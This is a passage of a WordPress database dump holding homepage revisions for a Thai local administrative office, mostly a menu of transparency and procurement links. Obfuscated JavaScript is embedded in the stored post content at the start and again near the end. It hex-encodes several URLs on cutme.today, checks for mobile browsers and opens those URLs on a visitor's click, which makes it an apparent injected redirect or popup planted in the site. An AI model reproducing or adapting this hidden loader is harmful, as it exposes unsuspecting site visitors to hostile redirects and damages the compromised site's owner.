Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-20 19:37:12','2024-08-20 12:37:12','',14,'http://pakhaeng.ssk.in.th/?p=1006',0,'revision','',0),
(1007,1,'2024-08-20 19:37:28','2024-08-20 12:37:28','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'sto